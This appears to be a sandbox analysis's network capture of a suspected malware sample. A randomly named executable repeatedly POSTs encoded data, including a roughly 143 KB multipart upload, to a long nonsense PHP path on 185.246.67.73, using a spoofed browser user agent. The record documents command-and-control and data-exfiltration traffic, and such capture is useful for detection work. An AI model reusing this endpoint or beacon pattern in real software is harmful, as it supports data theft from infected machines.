                                                                                                                      Dec 8, 2024 15:27:23.700581074 CET384OUTData Raw: 55 5e 43 53 5e 43 50 52 54 5e 50 59 5b 5e 59 5a 59 5f 59 5c 57 50 51 56 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U^CS^CPRT^PY[^YZY_Y\WPQVYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-'Z&_*# =.B.]"+>8/'-#' %%(1"?;\,+ ]!![ 8
                                                                                                                      Dec 8, 2024 15:27:23.784945011 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:24.138971090 CET324INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:23 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 12 31 25 05 56 29 2a 2e 5b 26 3c 33 5e 24 28 20 06 2a 0e 23 16 25 39 05 07 2c 29 37 1d 37 12 27 07 30 03 28 5c 20 3f 3f 50 2d 12 20 5a 06 10 22 05 26 01 3f 1f 28 3b 22 04 32 3b 35 0a 22 37 2b 45 30 3e 33 19 3e 14 08 17 34 2f 09 57 32 03 00 0b 39 1c 36 5e 26 30 01 1e 32 0c 2c 55 0f 1f 25 0c 33 0c 3b 55 22 24 22 1d 22 1e 23 17 26 1b 0c 56 36 2f 27 0a 2b 03 01 01 3f 21 3f 01 37 32 2f 5e 2e 2b 3a 05 2a 0b 3b 1d 30 06 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 91%V)*.[&<3^$( *#%9,)77'0(\ ??P- Z"&?(;"2;5"7+E0>3>4/W296^&02,U%3;U"$""#&V6/'+?!?72/^.+:*;0 S*.T3VR
                                                                                                                      Dec 8, 2024 15:27:24.178987026 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:24.528738976 CET1904OUTData Raw: 50 5f 43 52 5e 40 50 53 54 5e 50 59 5b 59 59 52 59 5f 59 57 57 5d 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P_CR^@PST^PY[YYRY_YWW]QYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-3&&Y5Y-]7X8830>X%3.%8! ,8 ]!![ $
                                                                                                                      Dec 8, 2024 15:27:24.610380888 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:24.968080044 CET324INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:24 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 57 25 25 3f 52 2a 5c 35 03 32 05 23 5f 27 28 2c 06 2b 33 33 5c 27 07 23 07 2f 3a 05 13 20 05 28 5c 27 2e 30 13 22 02 2c 09 2e 02 20 5a 06 10 21 5f 24 2f 01 5b 2b 38 26 05 26 06 35 07 35 0e 24 19 24 2d 27 53 3d 3a 21 06 23 2c 2b 1f 32 2d 03 11 2f 25 00 59 25 56 2b 54 31 1c 2c 55 0f 1f 26 53 24 1c 2f 1c 34 0e 36 1c 22 0e 38 02 32 26 21 0a 35 3f 2c 56 28 2d 05 06 3c 0b 3b 04 34 32 06 07 2d 05 0b 16 2a 32 3f 1e 25 3c 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 9W%%?R*\52#_'(,+33\'#/: (\'.0",. Z!_$/[+8&&55$$-'S=:!#,+2-/%Y%V+T1,U&S$/46"82&!5?,V(-<;42-*2?%< S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      1192.168.2.449744185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:23.554249048 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2580
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:23.904259920 CET2580OUTData Raw: 50 52 43 53 5b 45 55 56 54 5e 50 59 5b 58 59 52 59 5c 59 56 57 56 51 5a 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: PRCS[EUVT^PY[XYRY\YVWVQZYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.X'5Z29!Z" 59"\ 8*Y;8+0.31>X&]"\7$8 ]!![
                                                                                                                      Dec 8, 2024 15:27:24.876287937 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:25.108330011 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:24 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.449745185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:26.060688019 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:26.419344902 CET2584OUTData Raw: 55 5c 46 57 5b 41 55 5f 54 5e 50 59 5b 51 59 5b 59 5c 59 5b 57 53 51 59 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U\FW[AU_T^PY[QY[Y\Y[WSQYYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y-$=-%)=X6 !.B*\ [,(U'$^%5'8: ?'.; ]!![


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.449746185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:26.923719883 CET608OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=----QmKelCPMJNdPTxYb2WuoQ8QeKKO9Rja8qH
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 143234
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:27.278898001 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 51 6d 4b 65 6c 43 50 4d 4a 4e 64 50 54 78 59 62 32 57 75 6f 51 38 51 65 4b 4b 4f 39 52 6a 61 38 71 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                                      Data Ascii: ------QmKelCPMJNdPTxYb2WuoQ8QeKKO9Rja8qHContent-Disposition: form-data; name="0"Content-Type: text/plainPXFQ^CPRT^PY[_YXY[YWWWQ]YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY
                                                                                                                      Dec 8, 2024 15:27:27.399445057 CET2472OUTData Raw: 38 5a 73 64 30 6f 31 76 53 33 65 79 68 36 53 34 68 58 77 4c 66 37 31 68 75 79 7a 62 44 61 33 4a 4e 4b 4b 74 46 6b 34 58 4d 70 67 5a 64 70 6b 31 57 65 54 6d 31 6f 49 41 71 6b 38 6b 41 30 38 61 6f 45 52 58 65 32 58 64 46 61 39 79 33 77 59 35 51 63
                                                                                                                      Data Ascii: 8Zsd0o1vS3eyh6S4hXwLf71huyzbDa3JNKKtFk4XMpgZdpk1WeTm1oIAqk8kA08aoERXe2XdFa9y3wY5Qco//0Z0jI8JC08ubQSK6mX00tWnByV4MoD596sWlAYGG/mXvYRH6xoSqD7QizgARnWfUmM3WPsIlDKQnLyEvgynUpdboNTPv3keB3MugFdi+3GMV0DOYQ6A4l5E9nGbiFIiNd5BNIYzEwox6hzziWmQU6hIERFYXkI
                                                                                                                      Dec 8, 2024 15:27:27.399477005 CET2472OUTData Raw: 55 4a 4a 69 61 45 41 74 32 52 66 66 41 4d 37 36 4e 72 35 55 68 45 35 35 74 4c 43 59 41 6e 54 4b 7a 68 79 31 6b 46 34 76 42 42 61 2b 44 75 32 38 51 76 31 63 6b 73 4e 46 4f 6e 65 49 37 46 79 58 45 56 77 7a 62 57 78 74 6c 49 76 4f 77 30 6c 73 34 67
                                                                                                                      Data Ascii: UJJiaEAt2RffAM76Nr5UhE55tLCYAnTKzhy1kF4vBBa+Du28Qv1cksNFOneI7FyXEVwzbWxtlIvOw0ls4g//2f5dfz7v6uNzbW/WHowKu+ZRgG4FC9t3dxfjQ4ystnh3Jxi7TJN+PR7aeN0w14p9ptN74pZkKmY8kS5BLWXarMGZkEf8HfAiWNfQzDQ/CP35hlhk46A+cpT8qO7Db5I8ucBzr7G5wVCQAoTYxqzvz5BRp3fi5z2
                                                                                                                      Dec 8, 2024 15:27:27.399532080 CET4944OUTData Raw: 6e 43 53 64 51 33 4a 68 56 69 78 75 4c 76 6e 44 4a 6a 6b 71 74 68 2f 46 76 61 63 39 2f 34 71 61 51 6d 6e 37 5a 48 32 59 72 46 6f 6c 75 44 64 44 4e 72 41 4e 73 6f 31 59 48 79 4f 72 37 6b 6a 76 34 63 46 76 64 39 7a 4a 66 34 34 77 66 32 37 62 72 54
                                                                                                                      Data Ascii: nCSdQ3JhVixuLvnDJjkqth/Fvac9/4qaQmn7ZH2YrFoluDdDNrANso1YHyOr7kjv4cFvd9zJf44wf27brT3rz/Yt3Y8Mth0wqpiTvFs6Ey3cO3kz9wwyTeC7dFRVx7vILb2MO3HtZLnzb5FL6TFMh35qedUUYMrMLWdrrzD0ZwcFmIaCDNyiLLR3EjQZoaBtffr6QYygWMW8uVKq4LneFcUb3ZxMDx65vWyQuNbwpe79R+/zvl+
                                                                                                                      Dec 8, 2024 15:27:27.399647951 CET4944OUTData Raw: 74 68 52 4f 34 63 73 32 63 6a 43 50 54 48 45 57 66 71 37 53 6d 4e 4a 6a 46 5a 46 76 78 57 4d 75 44 57 57 77 54 56 38 32 4f 30 70 42 7a 6c 4f 41 4b 4e 43 49 2f 77 72 6b 4f 71 70 68 73 30 37 71 6d 6e 4d 4c 2f 53 78 68 38 2f 74 44 78 65 2f 44 2b 52
                                                                                                                      Data Ascii: thRO4cs2cjCPTHEWfq7SmNJjFZFvxWMuDWWwTV82O0pBzlOAKNCI/wrkOqphs07qmnML/Sxh8/tDxe/D+Rw3l2KD+0nX4TU65wixXkhTugu3F56PBw6UX/r0vb3O0XHBbgnTUYiYHj8ol9A+T3hTO7f+LSylt7xBwvmM1N8XPDXFiL3+N1m0PLX8HVZiqWaZ43WJHxvnyBpGCnhm6P2a/MZyWUe94noNhHgsrOpRe7P6m1rriNN
                                                                                                                      Dec 8, 2024 15:27:27.399776936 CET4944OUTData Raw: 35 4b 6b 52 65 74 46 56 44 41 6b 2f 76 4a 6c 39 7a 63 45 71 72 55 63 6a 58 56 50 57 6d 79 32 43 49 69 73 62 63 7a 47 45 4e 6a 46 56 4d 46 71 58 6c 54 30 37 71 2f 6c 58 37 4f 73 76 55 34 49 39 75 35 6e 6c 31 7a 4f 30 6b 6b 56 62 51 5a 68 69 44 7a
                                                                                                                      Data Ascii: 5KkRetFVDAk/vJl9zcEqrUcjXVPWmy2CIisbczGENjFVMFqXlT07q/lX7OsvU4I9u5nl1zO0kkVbQZhiDziYDxkxF131YLDqX2r4FcasyM7AhLGilfREH/pfc2kBTbUZYRFaNB8l5c47TrXZM6W/zJOmVU6n8DQ0lkIgMhKht6mev94di/q83UOQ3g8KrbS2KTJu9ubQxobi4WRydAxSpShVWjr9cYmC/WMScqnYKcaUfIX+rqi
                                                                                                                      Dec 8, 2024 15:27:27.399806976 CET4944OUTData Raw: 77 79 36 6c 50 7a 4d 46 74 48 77 63 75 78 51 37 5a 54 6c 64 52 35 38 37 4b 31 36 70 70 6c 50 54 62 78 41 58 51 6f 63 57 52 38 6d 39 67 6a 58 52 58 45 64 70 48 38 6d 48 69 6c 66 4d 32 73 4f 30 53 32 67 6e 65 43 53 74 37 42 6f 74 30 33 76 55 66 48
                                                                                                                      Data Ascii: wy6lPzMFtHwcuxQ7ZTldR587K16pplPTbxAXQocWR8m9gjXRXEdpH8mHilfM2sO0S2gneCSt7Bot03vUfHTwC+Q3k0zL8g0aAgd/KjzYmBtbZAsxwc0lrICOPncX2N749N5zVhk/u3RvKdiPSTvxDnOmM/GD1rA34gNSRYXmA9zPuRxVeKb97/Wyj98jmh1/lTpPVrzj2SqiKLXWcZF26MJBGWZGIaMkJjnleNFl4n3CgvxEwJ2
                                                                                                                      Dec 8, 2024 15:27:27.519068956 CET4944OUTData Raw: 52 64 2f 34 43 53 4e 36 65 57 67 4e 39 65 58 2f 5a 6f 78 2f 53 64 4c 68 39 77 36 67 4e 63 50 49 52 57 77 56 2f 33 79 6b 44 4c 30 6d 2f 38 57 74 31 50 2b 65 31 32 55 56 5a 6c 46 4b 62 59 6a 2b 6f 6b 73 49 4a 72 52 76 4f 6f 32 65 36 2f 34 2f 75 65
                                                                                                                      Data Ascii: Rd/4CSN6eWgN9eX/Zox/SdLh9w6gNcPIRWwV/3ykDL0m/8Wt1P+e12UVZlFKbYj+oksIJrRvOo2e6/4/ueX596Dq5+7xe3X1Ul/WfjGLeFJu7Zj4X53+qwPo+GBdLBLr8o0eZrP4IcHovVKOpqt6B/EPusj+m64a+V+bxQ2a6McWgqfuklbA3Tbt9cJX1tsDXk2bDpG8VVP79cte4Z3RootVako33MAmV9bqUv5I02B8SoLHxhk
                                                                                                                      Dec 8, 2024 15:27:27.519087076 CET4944OUTData Raw: 51 51 37 74 46 58 75 45 41 75 6f 77 69 48 78 36 2f 79 4c 38 66 7a 36 71 68 6f 58 76 49 36 46 6f 4f 31 2f 2f 43 48 52 2b 62 58 53 39 37 76 39 49 4e 64 74 2f 71 4a 5a 48 45 33 32 76 78 2b 51 2f 4a 4b 72 2f 4a 6a 45 54 53 63 58 5a 50 48 31 41 31 43
                                                                                                                      Data Ascii: QQ7tFXuEAuowiHx6/yL8fz6qhoXvI6FoO1//CHR+bXS97v9INdt/qJZHE32vx+Q/JKr/JjETScXZPH1A1Ce13VR34V4Ng0kESX53997+F4X/gzElC481N8BH+P/FBuLfbID27Ev9izPoR3scUj2nKEDq0uWn9gb5s0IU8E/GooC0pf/Ba2gaep5ni3QNaU+qJDz+kNqLAn7RWnP+PWmo5201bfY6eQipsUnjksKXwJs0qf5RUMO
                                                                                                                      Dec 8, 2024 15:27:27.519159079 CET2472OUTData Raw: 54 6c 52 6a 70 33 64 58 74 7a 70 2b 31 50 44 79 73 43 49 77 2b 4e 72 65 2f 74 37 57 74 73 4f 6b 4b 4a 57 75 68 36 49 58 37 68 69 54 6e 6e 35 4b 43 46 78 71 43 6a 2b 56 66 31 74 37 57 43 5a 75 62 6d 71 49 4b 32 50 67 36 56 4e 6c 53 34 6f 59 4e 66
                                                                                                                      Data Ascii: TlRjp3dXtzp+1PDysCIw+Nre/t7WtsOkKJWuh6IX7hiTnn5KCFxqCj+Vf1t7WCZubmqIK2Pg6VNlS4oYNfltoQVJifjFVrXDTIICsQ7u0aSx+8+z7i4eEau2RpvGUhWch0pptzRpwLXzKLm879iyZ1Sq8QjE5EQF/MdBzMouwU77236kUtL+Xe20aSkOk5p1Jy6i9zqC+6GpGNoibrP9q8iEDyiF0HMLgQIYP22fYb4T+IHgsqX
                                                                                                                      Dec 8, 2024 15:27:28.261780977 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:28.932205915 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:28 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.449747185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:27.050385952 CET562OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Dec 8, 2024 15:27:27.403839111 CET2584OUTData Raw: 55 5c 43 5d 5b 46 55 53 54 5e 50 59 5b 5a 59 53 59 5d 59 5c 57 55 51 5c 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: U\C][FUST^PY[ZYSY]Y\WUQ\YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.0)2_&609\,$#Z/8$X<X&#=';4<+/ ]!![ (
                                                                                                                      Dec 8, 2024 15:27:28.380140066 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:28.612236023 CET207INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:28 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.449748185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:28.961730957 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 2584
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:29.310036898 CET2584OUTData Raw: 50 5d 43 51 5b 41 50 54 54 5e 50 59 5b 5e 59 5d 59 59 59 5f 57 55 51 57 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: P]CQ[APTT^PY[^Y]YYY_WUQWYXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.[3["&)# )]-42 "X/+3$'012;" /</+ ]!![ 8
                                                                                                                      Dec 8, 2024 15:27:30.290189028 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:30.538415909 CET151INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:30 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Content-Length: 4
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 34 5b 40 58
                                                                                                                      Data Ascii: 4[@X


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.449749185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Dec 8, 2024 15:27:30.104617119 CET538OUTPOST /Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php HTTP/1.1
                                                                                                                      Content-Type: application/octet-stream
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                                                      Host: 185.246.67.73
                                                                                                                      Content-Length: 1904
                                                                                                                      Expect: 100-continue
                                                                                                                      Dec 8, 2024 15:27:30.450773954 CET1904OUTData Raw: 55 58 46 56 5e 47 55 52 54 5e 50 59 5b 51 59 53 59 5c 59 5c 57 54 51 5f 59 58 5a 5e 51 5b 55 5c 5d 5d 56 54 59 5c 52 5d 5c 5d 59 56 50 5e 5f 5a 50 5c 5b 58 58 5e 50 59 56 5a 5e 5b 58 59 5a 43 5a 52 41 46 59 5c 55 54 46 5f 5c 59 58 5a 5d 5f 5b 5c
                                                                                                                      Data Ascii: UXFV^GURT^PY[QYSY\Y\WTQ_YXZ^Q[U\]]VTY\R]\]YVP^_ZP\[XX^PYVZ^[XYZCZRAFY\UTF_\YXZ]_[\WSSDQZ^PUW[VSPYT\VZV]V[V\SYUX\]D]PZ^ZSS_^\ST[Y^WY[P]^ZCR]TY]ZWP]RY]XPYYYB_T_PP]P^[]Z^Q\^QU^UZ_]\XQ\P^Y.%>>&_9X!0*-':#8Y.(;0-,Y15&;!#?Z/; ]!![
                                                                                                                      Dec 8, 2024 15:27:31.437135935 CET25INHTTP/1.1 100 Continue
                                                                                                                      Dec 8, 2024 15:27:31.676366091 CET324INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 08 Dec 2024 14:27:31 GMT
                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Length: 152
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Data Raw: 06 13 39 1f 31 1c 2b 1d 3e 3a 39 00 27 3f 27 58 30 2b 20 02 2a 20 33 16 24 5f 27 02 2c 14 23 56 23 2f 20 5e 24 3d 02 5d 21 02 3b 1a 39 38 20 5a 06 10 21 5e 26 06 3f 10 3f 28 21 5d 26 2b 21 42 35 0e 20 1c 30 2d 2b 19 2a 04 0b 04 37 3f 3f 56 32 3d 03 1e 3a 36 3d 07 32 33 30 09 26 0c 2c 55 0f 1f 26 18 26 31 38 0f 22 34 3e 12 22 23 3b 17 31 35 0c 57 36 01 2b 0f 3f 03 24 5b 3c 0c 0e 5c 34 0b 27 5e 2e 2b 29 5e 3d 54 20 0c 24 06 20 53 2a 02 2e 54 0d 33 56 52
                                                                                                                      Data Ascii: 91+>:9'?'X0+ * 3$_',#V#/ ^$=]!;98 Z!^&??(!]&+!B5 0-+*7??V2=:6=230&,U&&18"4>"#;15W6+?$[<\4'^.+)^=T $ S*.T3VR


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.449750185.246.67.73808028C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
